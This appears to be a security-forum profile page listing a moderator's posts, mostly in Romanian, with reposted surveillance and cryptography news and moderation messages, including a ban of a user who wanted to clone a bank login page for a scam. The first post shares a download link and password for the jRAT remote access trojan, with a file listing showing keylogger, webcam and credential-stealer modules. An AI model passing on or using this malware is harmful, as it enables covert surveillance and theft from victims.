-
Posts
4970 -
Joined
-
Last visited
-
Days Won
373
Everything posted by aelius
-
Download from here: http://www.sendspace.com/file/s96iwp The password EnjoyFuckingRedpoison I don't know if this shit works but you can extract all files from the archive. macbook Downloads$ mv jRAT.rar temp/ macbook Downloads$ cd temp/ macbook temp$ unrar x jRAT.rar UNRAR 4.20 freeware Copyright (c) 1993-2012 Alexander Roshal Extracting from jRAT.rar Enter password (will not be echoed) for args.txt: Creating jRAT OK Extracting jRAT/args.txt OK jRAT/Client.jar - use current password ? [Y]es, [N]o, [A]ll A Extracting jRAT/Client.jar OK Creating jRAT/files OK Extracting jRAT/files/API Stub.jar OK Extracting jRAT/files/API.jar OK Extracting jRAT/files/Builder.exe OK Extracting jRAT/files/db.dat OK Creating jRAT/files/help OK Creating jRAT/files/help/Building OK Extracting jRAT/files/help/Building/Allowed OS.txt OK Extracting jRAT/files/help/Building/Binder.txt OK Extracting jRAT/files/help/Building/Debug Messages.txt OK Extracting jRAT/files/help/Building/Delay.txt OK Extracting jRAT/files/help/Building/Error Handling.txt OK Extracting jRAT/files/help/Building/Final.txt OK Extracting jRAT/files/help/Building/General.txt OK Extracting jRAT/files/help/Building/Host File.txt OK Extracting jRAT/files/help/Building/Install Message.txt OK Extracting jRAT/files/help/Building/Mutex.txt OK Extracting jRAT/files/help/Building/Network.txt OK Extracting jRAT/files/help/Building/Output.txt OK Extracting jRAT/files/help/Building/Persistance.txt OK Extracting jRAT/files/help/Building/Plugins.txt OK Extracting jRAT/files/help/Building/Startup.txt OK Extracting jRAT/files/help/Building/Timeout.txt OK Extracting jRAT/files/help/Building/Tray Icon.txt OK Extracting jRAT/files/help/Building/USB.txt OK Creating jRAT/files/help/Control Panel OK Creating jRAT/files/help/Control Panel/File System OK Extracting jRAT/files/help/Control Panel/File System/File Manager.txt OK Extracting jRAT/files/help/Control Panel/File System/File Searcher.txt OK Creating jRAT/files/help/Control Panel/Fun OK Extracting jRAT/files/help/Control Panel/Fun/Drain CPU.txt OK Extracting jRAT/files/help/Control Panel/Fun/Fun Manager.txt OK Extracting jRAT/files/help/Control Panel/Fun/Messagebox.txt OK Extracting jRAT/files/help/Control Panel/Fun/Piano.txt OK Extracting jRAT/files/help/Control Panel/Fun/Remote Chat.txt OK Creating jRAT/files/help/Control Panel/Network Functions OK Extracting jRAT/files/help/Control Panel/Network Functions/Download Manager.txt OK Creating jRAT/files/help/Control Panel/Remote MSConfig OK Extracting jRAT/files/help/Control Panel/Remote MSConfig/Registry Startup.txt OK Extracting jRAT/files/help/Control Panel/Remote MSConfig/Windows Services.txt OK Creating jRAT/files/help/Control Panel/Scripting OK Extracting jRAT/files/help/Control Panel/Scripting/Batch.txt OK Extracting jRAT/files/help/Control Panel/Scripting/HTML.txt OK Extracting jRAT/files/help/Control Panel/Scripting/JavaScript.txt OK Extracting jRAT/files/help/Control Panel/Scripting/VB Script.txt OK Creating jRAT/files/help/Control Panel/Spy Functions OK Extracting jRAT/files/help/Control Panel/Spy Functions/Keylogger.txt OK Extracting jRAT/files/help/Control Panel/Spy Functions/Offline Keylogger.txt OK Extracting jRAT/files/help/Control Panel/Spy Functions/Remote Screen.txt OK Extracting jRAT/files/help/Control Panel/Spy Functions/Sound Capture.txt OK Creating jRAT/files/help/Control Panel/Stealers and Data OK Extracting jRAT/files/help/Control Panel/Stealers and Data/Clipboard.txt OK Extracting jRAT/files/help/Control Panel/Stealers and Data/FileZilla.txt OK Extracting jRAT/files/help/Control Panel/Stealers and Data/Minecraft.txt OK Extracting jRAT/files/help/Control Panel/Stealers and Data/uTorrent downloads.txt OK Creating jRAT/files/help/Control Panel/System Functions OK Extracting jRAT/files/help/Control Panel/System Functions/Hosts File.txt OK Extracting jRAT/files/help/Control Panel/System Functions/Installed Programs.txt OK Extracting jRAT/files/help/Control Panel/System Functions/Registry.txt OK Extracting jRAT/files/help/Control Panel/System Functions/Remote CMD.txt OK Extracting jRAT/files/help/Control Panel/System Functions/Remote Process.txt OK Creating jRAT/files/help/Control Panel/System Info OK Extracting jRAT/files/help/Control Panel/System Info/Computer Info.txt OK Extracting jRAT/files/help/Control Panel/System Info/Drives.txt OK Extracting jRAT/files/help/Control Panel/System Info/Environment Variables.txt OK Extracting jRAT/files/help/Control Panel/System Info/JVM Info.txt OK Extracting jRAT/files/help/Control Panel/System Info/Monitors.txt OK Extracting jRAT/files/help/Control Panel/System Info/System Monitor.txt OK Extracting jRAT/files/help/Control Panel/System Info/System Properties.txt OK Creating jRAT/files/help/Customizing Appearance OK Extracting jRAT/files/help/Customizing Appearance/Changing Icons.txt OK Extracting jRAT/files/help/Customizing Appearance/Colors.txt OK Extracting jRAT/files/help/Customizing Appearance/Ping Icons.txt OK Creating jRAT/files/help/Sockets OK Extracting jRAT/files/help/Sockets/Listening.txt OK Extracting jRAT/files/Installer.jar OK Extracting jRAT/files/Stub.jar OK Extracting jRAT/launch_unix.sh OK Extracting jRAT/launch_win.bat OK Creating jRAT/plugins OK Creating jRAT/plugins/Keylogger OK Extracting jRAT/plugins/Keylogger/icon.png OK Extracting jRAT/plugins/Keylogger.jar OK Creating jRAT/plugins/stubs OK Extracting jRAT/plugins/stubs/Keylogger with window titles (Windows only).jar OK Extracting jRAT/plugins/stubs/Keylogger.jar OK Extracting jRAT/plugins/stubs/Webcam.jar OK Creating jRAT/plugins/Webcam OK Extracting jRAT/plugins/Webcam/config.properties OK Extracting jRAT/plugins/Webcam/icon.png OK Extracting jRAT/plugins/Webcam.jar OK Creating jRAT/settings OK Extracting jRAT/settings/.bookmarks OK Extracting jRAT/settings/.colors OK Extracting jRAT/settings/.id OK Extracting jRAT/settings/.settings OK Extracting jRAT/settings/.sockets OK Extracting jRAT/settings/.stats OK Extracting jRAT/settings/.theme OK Creating jRAT/files/notes OK All OK macbook temp$ cd .. macbook Downloads$ rm -rf temp/ macbook Downloads$
-
PARIS — For all their indignation last summer, when the scope of the United States’ mass data collection began to be made public, the French are hardly innocents in the realm of electronic surveillance. Within days of the reports about the National Security Agency’s activities, it was revealed that French intelligence services operated a similar system, with similarly minimal oversight. And last week, with little public debate, the legislature approved a law that critics feared would markedly expand electronic surveillance of French residents and businesses. The provision, quietly passed as part of a routine military spending bill, defines the conditions under which intelligence agencies may gain access to or record telephone conversations, emails, Internet activity, personal location data and other electronic communications. The law provides for no judicial oversight and allows electronic surveillance for a broad range of purposes, including “national security,” the protection of France’s “scientific and economic potential” and prevention of “terrorism” or “criminality.” In an unusual alliance, Internet and corporate groups, human rights organizations and a small number of lawmakers have opposed the law as a threat to business or an encroachment on individual rights. The government argues that the law, which does not take effect until 2015, does little to expand intelligence powers. Rather, officials say, those powers have been in place for years, and the law creates rules where there had been none, notably with regard to real-time location tracking. While conceding that the new law “does effectively expand the existing regime to adapt it to the missions and reality of our intelligence services,” Defense Minister Jean-Yves Le Drian told the Senate that “it especially reinforces oversight as compared with the current situation.” In effect, analysts say, the government has either staked out rights to a vast new range of surveillance practices, or acknowledged that it has already been collecting far more data, under far less regulated circumstances, than people realized. Neither prospect is terribly comforting to the law’s opponents. “We feel that anything can be placed under the heading ‘national security,’ ” said Clémence Bectarte, a lawyer for the International Federation for Human Rights. The law, she said, expanded the list of state administrations authorized to request electronic surveillance, for example to include the budget ministry. “There should have been a parliamentary commission and a real public debate,” she said. French intelligence agencies have little experience publicly justifying their practices. Parliamentary oversight did not begin until 2007. The Association des Services Internet Communautaires, or @sic, an advocacy group whose members include AOL, eBay, Facebook, Google, Microsoft and several top French Internet companies, discovered the new legislation essentially by chance. “There was no consultation at all,” said Giuseppe de Martino, @sic’s director and an executive at Dailymotion, a French online video service. “No one said anything about it to us.” The National Commission for Information Technology and Freedoms, a state administration meant to protect the rights and privacy of citizens, said it was not consulted on the contentious elements of the bill, though it was asked to review other provisions. The government denied any effort to shield the law from public scrutiny. The bill went through four votes in Parliament, noted one government official. “Not exactly discreet, as maneuvers go,” he said, speaking on condition of anonymity because he was not authorized to speak publicly. @sic said the law could give the authorities blanket rights to seize “all documents stocked in a ‘cloud’ service subscribed by a given Internet user,” for instance. Currently, such a seizure would require a warrant, the group argued. “We don’t know what this is going to mean in practice,” Mr. de Martino said. “But now the doors are open.” French intelligence services are already reputed to be rapacious collectors of foreign industrial secrets, and there is some concern the law could discourage international investment. Internet service companies worry that users may begin to turn away from the Internet or share their personal information less freely. But Jean-Pierre Sueur, a senator from President François Hollande’s Socialist Party, said identical provisions have been in place since the passage of an electronic intercepts law in 1991. “If they’re angry about this, they ought to have been angry for 23 years,” Mr. Sueur said. The new law created “only additional guarantees,” he said, and stricter rules for the 200,000 or so intercept operations conducted by French intelligence services each year. He rejected calls for judicial oversight, saying, “In the context of the antiterror fight, day to day, it’s impossible.” Alain Juillet, president of the Academy of Economic Intelligence and a former intelligence director for France’s foreign intelligence service, said the law’s value was “that it puts a framework where there wasn’t one before. Before, there was nothing; it was total freedom,” he said. Laurent Borredon, a reporter for Le Monde, qualified that endorsement. “If one can reproach the parliamentarians for something,” he wrote last week, “it’s to have regulated the tip of an iceberg whose depth we’re only barely beginning to measure today.” Source: http://www.nytimes.com/2013/12/15/world/europe/france-broadens-its-surveillance-power.html?src=recg
-
SAN FRANCISCO — A team of European and American mathematicians and cryptographers have discovered an unexpected weakness in the encryption system widely used worldwide for online shopping, banking, e-mail and other Internet services intended to remain private and secure. The flaw — which involves a small but measurable number of cases — has to do with the way the system generates random numbers, which are used to make it practically impossible for an attacker to unscramble digital messages. While it can affect the transactions of individual Internet users, there is nothing an individual can do about it. The operators of large Web sites will need to make changes to ensure the security of their systems, the researchers said. The potential danger of the flaw is that even though the number of users affected by the flaw may be small, confidence in the security of Web transactions is reduced, the authors said. The system requires that a user first create and publish the product of two large prime numbers, in addition to another number, to generate a public “key.” The original numbers are kept secret. To encrypt a message, a second person employs a formula that contains the public number. In practice, only someone with knowledge of the original prime numbers can decode that message. For the system to provide security, however, it is essential that the secret prime numbers be generated randomly. The researchers discovered that in a small but significant number of cases, the random number generation system failed to work correctly. The importance in ensuring that encryption systems do not have undetected flaws cannot be overstated. The modern world’s online commerce system rests entirely on the secrecy afforded by the public key cryptographic infrastructure. The researchers described their work in a paper that the authors have submitted for publication at a cryptography conference to be held in Santa Barbara, Calif., in August. They made their findings public Tuesday because they believe the issue is of immediate concern to the operators of Web servers that rely on the public key cryptography system. “This comes as an unwelcome warning that underscores the difficulty of key generation in the real world,” said James P. Hughes, an independent Silicon Valley cryptanalyst who worked with a group of researchers led by Arjen K. Lenstra, a widely respected Dutch mathematician who is a professor at the École Polytechnique Fédérale de Lausanne in Switzerland. “Some people may say that 99.8 percent security is fine,” he added. That still means that approximately as many as two out of every thousand keys would not be secure. The researchers examined public databases of 7.1 million public keys used to secure e-mail messages, online banking transactions and other secure data exchanges. The researchers employed the Euclidean algorithm, an efficient way to find the greatest common divisor of two integers, to examine those public key numbers. They were able to produce evidence that a small percentage of those numbers were not truly random, making it possible to determine the underlying numbers, or secret keys, used to generate the public key. They said they “stumbled upon” almost 27,000 different keys that offer no security. “Their secret keys are accessible to anyone who takes the trouble to redo our work,” they wrote. To prevent this, one of the organizations that had collected the public keys has removed the information from the Internet and taken steps to protect it from theft. To perform their study, the researchers used several databases of public keys, including one at the Massachusetts Institute of Technology and another created by the Electronic Frontier Foundation, a Internet privacy rights group. The foundation’s database results from a project, known as the SSL Observatory, originally intended to investigate the security of the digital certificates that are used to protect encrypted data transmitted between Internet users and Web sites. “We were very careful: we did not intercept any traffic, we did not sniff any networks,” Mr. Hughes said. “We went to databases that contained public information and downloaded public keys.” Source: http://www.nytimes.com/2012/02/15/technology/researchers-find-flaw-in-an-online-encryption-method.html?_r=0
-
- authentication
- encrypt
-
(and 3 more)
Tagged with:
-
Bine ai venit, rau ai nimerit. (02:38:04) Vmask: incerc de ceva timp sa copiez pacina de login www.postepay.it nu reusesc deloc (02:38:10) Vmask: ma poate ajuta cineva (02:39:04) Vmask: bineinteles nu degeaba (02:40:50) tex: Vmask (02:41:01) tex: postepay e banca (02:41:06) tex: de ce ai vrea s-o copiezi ? (02:42:30) tex: pentru scam ? (02:42:48) Vmask: da (02:43:14) RST: Vmask has been logged out (Kicked). Scammer - La munca nu la furat banii oamenilor! Ban permanent.
-
SecureAuth, a provider of 2-Factor authentication solutions, this week launched SecureAuth 2-Factor as a Service (2FaaS), a cloud-hosted authentication solution. SecureAuth 2FaaS provides flexible authentication options while maintaining user credentials on-premise, the Irvine, California-based company said. According to the company, its s technology leverages a “Device Fingerprinting mechanism” that avoids placing a thick client or an insecure cookie on users' devices, making the solution ideal for enterprise-wide, B2C, and OEM integration. SecureAuth 2FaaS enables authentication via SMS, telephony, or PUSH notification OTPs, eliminating the need for hard tokens. The solution can be deployed for web applications, including Microsoft OWA, SharePoint, and IBM WebSphere. It can also be integrated with enterprise mobile applications, including Android, Apple and iOS apps. While the solution is cloud-based, no user information or password credentials are ever stored with SecureAuth or in the cloud, the company said. A graphical user interface (GUI) console gives administrators a selection of authentication protocols through easy to use dropdown menus and wizard installations, making integration into their applications and deployment easy and fast. Source: SecureAuth Launches 2-Factor as a Service | SecurityWeek.Com
-
WASHINGTON - The CIA pays AT&T more than $10 million a year to provide phone records with possible links to suspected terrorists, the New York Times reported Thursday, citing government officials. The arrangement is voluntary and there is no court order requiring the company to cooperate with the Central Intelligence Agency, officials told the Times. The program differs from controversial data collection by the National Security Agency, which receives phone records or other "meta-data" from telecommunications companies through court orders. The CIA passes on phone numbers of suspected militants abroad and AT&T then sifts through its database for records of phone calls that can identify foreigners with terror links, the newspaper reported. Most of the logs handed over by AT&T are related to foreign-to-foreign calls, the report said. For international calls that include one end in the United States, the company does not reveal the identity of the Americans and hides several digits of their phone numbers, which allows the CIA to comply with a ban on domestic spying, it said. The Central Intelligence Agency could choose to refer a hidden number to the FBI, which could then issue a subpoena demanding AT&T divulge the information, according to the report. An AT&T spokesman did not confirm or deny the program but said the firm acted in accordance with laws in the United States and in foreign countries. "In all cases, whenever any governmental entity anywhere seeks information from us, we ensure that the request and our response are completely lawful and proper," spokesman Mark Siegel told AFP. But he added: "We do not comment on questions concerning national security." Without verifying the existence of the program, the CIA said its intelligence gathering does not violate the privacy of Americans. "The CIA protects the nation and upholds the privacy rights of Americans by ensuring that its intelligence collection activities are focused on acquiring foreign intelligence and counterintelligence in accordance with US laws," said spokesman Todd Ebitz. The CIA is usually associated with gathering intelligence through spies in the field while the NSA focuses on eavesdropping abroad and code-breaking. But an unnamed intelligence official told the Times that the CIA sometimes needs to check phone records in "time-sensitive situations" and be able to act with speed and agility. The report offered the first indication that the CIA had a role in electronic data collection as leaks from a former intelligence contractor, Edward Snowden, have sparked a global firestorm around the NSA's digital spying. US Internet communications firms have voiced complaints that they are legally required to cooperate with the NSA's "data mining." Industry advocates have expressed concerns that NSA spying revelations could turn consumers in the US and abroad against the American technology companies. Source: CIA Paid AT&T for Phone Records: Report | SecurityWeek.Com
-
Probabil ca folosesti un cablu "ecranat" de proasta calitate (cablul care iti vine in receiver sau cel AV). Trece cumva vreunul pe langa priza ?
-
- root nu reprezinta un server - root nu reprezinta o distributie de linux "Trebuia sa intrebi: Am un server cu Linux, RedHat/Debian/Fedora/Ubuntu si doresc sa instalez perl. Ma puteti ajuta ?" - Daca vreti ajutor, evitati cuvintele astea "root, roata, scanu" si pana mea. Pa. Ban permanent.
-
ar trebui sa iei ban. next time, cand deschizi topicuri de genul, chiar e al tau
-
maxmind nu face update-uri cum trebuie. am o subnet si desi e alocat in UK, el arata ca e in romania (toate datele la whois arata de UK) Mai sunt si la RDS adrese ip cu 5.x (le vede de Olanda) Poate sa faci un tool sa se bazeze pe mai multe raspunsuri: maxmind, whois (ripe) + mtr/traceroute output (sa vezi nodurile prin care trece)
-
Butonul ... deasta e pus acolo, sa fie si putin fun Nu e chestie de raspuns la intrebari. Acolo sa fie doar pentru discutii tehnice, sa nu ne mai invadeze toti cu discutii despre muieri, iarba, Ousti, si altele
-
Sunteti de acord sa facem doua canale acolo ?. Adica sa fie cel default RST, cum este acum, si inca unul, TECH, pe care o sa fie numai discutii tehnice, sa nu mai vedem balarii acolo. Mai intra cate un om ce cere un mic ajutor si scriem de pomana ce si cum sa configureze, ca suntem spamati de alte texte. Este util si pentru discutii strict tehnice. // edit: Selectati POLL Nota: Multumim lui silvian0 pentru idee.
-
Study Shows Cost Of Data Center Outage at $7,900 Per Minute While never seen or talked about by most employees in a typical enterprise, data centers play a critical role in keeping operations moving and transactions processing, so it’s no surprise that any data center outage can be severely costly. As organizations continue to increasingly rely on technology and applications hosted in a data center, the cost of an outage has increased significantly, according to the results of a recent study. According to the 2013 Cost of Data Center Outages study, a Ponemon Institute study sponsored by Emerson Network Power, the cost of an unplanned data center outage is approximately $7,900 per minute, an increase of 41 percent from $5,600 in 2010. The 2013 report analyzed outage costs at 67 data centers within the last year across varying industry segments with a minimum size of 2,500 square feet. “Given the fact that today’s data centers support more critical, interdependent devices and IT systems than ever before, most would expect a rise in the cost of an unplanned data center outage compared to 2010. However, the 41 percent increase was higher than expected,” said Larry Ponemon, Ph.D., chairman and founder, the Ponemon Institute. “This increase in cost underscores the importance for organizations to make it a priority to minimize the risk of downtime that can potentially cost thousands of dollars per minute.” In September, Emerson Network Power released the first part of this study, which surveyed more than 450 U.S.-based data center professionals and focused on the root causes and frequency of data center downtime. Eighty-three percent of respondents said they knew the root cause of the unplanned outage. Thirty-four percent of respondents cited cyber attacks as the root cause of a data center outage, a 15 percent increase since 2010. Other frequently cited root causes of outages include: • UPS battery failure (55 percent) • Accidental EPO/human error (48 percent) • UPS capacity exceeded (46 percent). • Weather-related outage (30 percent) Highlights of the 2013 Costs of Data Center Outages report include: • Average cost of data center downtime across industries was approximately $7,900 per minute. (A 41 percent increase from the $5,600 in 2010.) • The average reported incident length was 86 minutes, resulting in average cost per incident of approximately $690,200. (In 2010 it was 97 minutes at approximately $505,500.) • For a total data center outage, which had an average recovery time of 119 minutes, average costs were approximately $901,500. (In 2010, it was 134 minutes at about $680,700.) • For a partial data center outage, which averaged 56 minutes in length, average costs were approximately $350,400. (In 2010, it was 59 minutes at approximately $258,000.) “Those organizations with revenue models that depend on the data center’s ability to deliver IT and networking services to customers – such as telecommunications service providers and e-commerce companies – and those that deal with a large amount of secure data – such as defense contractors and financial institutions – continue to incur the most significant costs associated with downtime; with the highest cost of a single event more than $1.7 million,” the report said. “As data centers continue to evolve to support businesses and organizations that are becoming more social, mobile and cloud-based, there is an increasing need for a growing number of companies and organizations to make it a priority to minimize the risk of downtime and commit the necessary investment in infrastructure technology and resources,” said Peter Panfil, vice president, global power, Emerson Network Power. Source: Cyber Attacks Are The Root Cause in 30 Percent of Data Center Outages: Study | SecurityWeek.Com
-
Pai da-le ma peste nas. Unde cacat vad ei carduri aici ? Futu-le sfintenia sufletelor de labagii notorii care vorbesc prostii.
-
Activitatea ta pe RST se termina la prezentare. Ban permanent. Thread closed.
-
doar dedicate - dar am vazut ca te ocupi cu scanul si nu prezinti incredere // edit: Asta ?
-
Cum s-ar spune, 'bashed'! (23:06:03) Oust: -bash: cd: /dev/sda4/: Not a directory (23:06:10) Oust: Plm, nu pot sa intr-un sda4. (23:06:11) Oust: E criptat.
-
post hunter, ban 24 de ore -> http://photobase.ro/di-78X1.png Va multumim pentru audienta.
-
Cumparati fratilor daca vreti. E 3 euro, ce rahat mai cautati seriale si nenorociri. E mai putin decat un pachet de tigari.
-
Baaaa, terminatilor, daca tot nu sunteti in stare sa va faceti un scanner bun, de ce saracia va apucati de rahaturi. Folositi toti synscan facut de Baganontu (DrBios) acum 14 ani in urma. L-au luat toti labagii gata facut si au pus un bash preacurvit international pe langa el cu "Powered by }{ Gica Hackeru, ilustrul geniu al lumii contemporane }{ cu pupici si floricele la nickname" sa vada lumea ca sunt ei priceputi. Mai stricati si cutiile oamenilor de pomana cu mizeriile astea. Ce sfantul excremente faceti cu ele ? Va faceti boti/emech/psybnc-uri pentru nemurirea sufletului ? Threadul asta aici nu e deschis de pomana. Si nu mai dezgropati threadurile astea adormite de mai bine de un an. Thread closed, da-l in sfantul si minunatul corahoz.
- 79 replies
-
- 2012
- bruteforce
-
(and 2 more)
Tagged with:
-
E URI prea lung, mai taie din el N-are rost sa dau pm.
-
Nu imi plac distributiile ce folosesc pachete/manager rpm. //offtopic shaggi, ce crocobaur zici acolo frate ? Doamne, cum suna, CrunchBang. De ce as utiliza o distributie bazata pe o alta distributie care la randul ei este debian based ? )
-
Asta denota ca statul comite orice ilegalitate pentru interesele sale. Practic accesezi example dot com pe https, certificatul este valid, domeniul example este cunoscut si te autentifici. Nu ai de unde stii ca o organizatie de stat redirecteaza traficul printr-un server local si mapeaza pe domeniu un alt certificat ssl pentru interceptarea de date. (sau ma rog, un certificat intermediar intre cel ce se afla in radacina browserelor si cel al domeniului)
- 2 replies
-
- chrome
- cyber defense
- (and 5 more)
-
Salutari, Au mai fost discutii de genul (chiar foarte multe) si nu s-a concretizat nimic pentru ca s-a cazut de comun acord ca sunt idei proaste. Aici nu sunt numai Romani iar comunitatea este deschisa pentru oricine este interesat si nu calca pe bec intr-un fel sau altul. Testele de genul ar descuraja inregistrarea in mod sigur. Da, am face o selectie probabil, dar nu cred ca e cazul sa ajungem la captcha de genul de mai jos pentru inregistrare. Cred ca e simplu, in orice moment este cel putin un moderator sau un admin online iar retarzii o sa isi ia ban in maxim un minut daca posteaza ceva aiurea.
- 14 replies
-
- jos manelele
- mie nu mi-ati dat like
-
(and 1 more)
Tagged with:
-
“ar fi” sau “ar fii”? | diacritica Si nu va mai intindeti la offtopic ca va luati ban pe coaja. @euintreb: Vorbeste frumos, las-o pe ma-sa in pace